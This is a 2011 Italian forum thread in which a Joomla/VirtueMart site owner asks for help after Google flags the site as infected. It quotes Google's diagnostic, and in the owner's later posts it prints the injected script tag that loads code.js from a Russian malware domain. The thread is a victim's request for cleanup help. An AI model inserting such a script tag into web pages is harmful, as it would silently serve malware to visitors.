|
|||||||
|
|
|
 |
|
|
Strumenti |
12-12-2011, 08:51
|
#1 |
|
Senior Member
Iscritto dal: Aug 2000
Messaggi: 742
|
Sito Infetto, cosa fare?
Ragazzi son odue anni che ho un sito su aruba, uso joomla 1.5 e virtuemart, tutto ok, ma questa mattina google mi ha bloccato il sito con questo annuncio:
www.bull-sc .com Ora non so proprio cosa fare, se era sul mio pc facevo scansione ecc, ma in remoto come comportarmi per ripristinare il prima possibile il danno? Grazie Scusate ma proprio ora ho visto che il sito è ripartito, quello che mi appariva era una schermata rossa che diceva che il sito era bloccato perchè era stato trovato un malware esattamente un collegamento da un sito russo: sh1090.ru Ultima modifica di Chill-Out : 12-12-2011 alle 09:35. Motivo: Editato link |
|
|
|
12-12-2011, 09:07
|
#2 |
|
Senior Member
Iscritto dal: Aug 2000
Messaggi: 742
|
un aiuto in più:
Navigazione sicura Pagina di diagnostica per bull-sc.com Qual è lo stato attuale di bull-sc.com nell'elenco? Il sito è indicato come sospetto: una visita a questo sito web potrebbe danneggiare il tuo computer. Parte del sito è stata segnalata per attività sospetta 2 volte nel corso degli ultimi 90 giorni. Che cosa è successo dopo la visita di Google a questo sito? Dal test di 3 pagine del sito eseguito negli ultimi 90 giorni, è emerso che da 2 pagine è stato scaricato e installato software dannoso senza l'autorizzazione dell'utente. L'ultima visita di Google a questo sito è stata effettuata in data 2011-12-11 e contenuto sospetto è stato rilevato l'ultima volta in data 2011-12-11. Software dannoso è ospitato su 2 domini, tra cui kupilkoprodb.in/, sh1090.ru/. 1 domini sembravano fungere da intermediari per la distribuzione di malware ai visitatori di questo sito, tra cui sh1090.ru/. Questo sito è stato ospitato su 1 reti tra cui AS31034 (ARUBA). Il sito ha assunto la funzione di intermediario per la distribuzione di malware? Nel corso degli ultimi 90 giorni, bull-sc.com non ha assunto la funzione di intermediario per la distribuzione di malware o virus ad altri siti. Questo sito ha ospitato malware? No, questo sito non ha ospitato software dannoso nel corso degli ultimi 90 giorni. Ragioni In alcuni casi, terze parti possono aggiungere codice dannoso a siti autentici e questo è il motivo alla base della visualizzazione del messaggio di avviso. Passaggi successivi: Torna alla pagina precedente. Se sei il proprietario di questo sito web, puoi chiedere che il tuo sito venga riesaminato utilizzando gli Strumenti per i Webmaster di Google. Per ulteriori informazioni sul processo di revisione, consulta il Centro assistenza per webmaster di Google. |
|
|
|
|
12-12-2011, 09:38
|
#3 |
|
Moderatore
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
|
Elimina sh1090.ru/wp-content/plugins/menu/code.js
__________________
Try again and you will be luckier.
|
|
|
|
|
12-12-2011, 09:50
|
#4 |
|
Senior Member
Iscritto dal: Aug 2000
Messaggi: 742
|
come faccio a trovarlo?
google lo ha trovato qui: <script type="text/javascript" src="http://sh1090.ru/wp-cont ent/plugins/menu/code.js"> ma questo dove si trova? |
|
|
|
|
12-12-2011, 10:07
|
#5 |
|
Senior Member
Iscritto dal: Aug 2000
Messaggi: 742
|
Ho trovato questa stringa sull'html di inizio del sito, dvoe fa il reindirizzamento alla cartella /web... li dentro è installato joomla.
A questo punto penso che hanno infettato solo il codice html iniziale e non tutto joomla.. come posso fare a rendere sicura questa pagina iniziale? |
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 07:00.
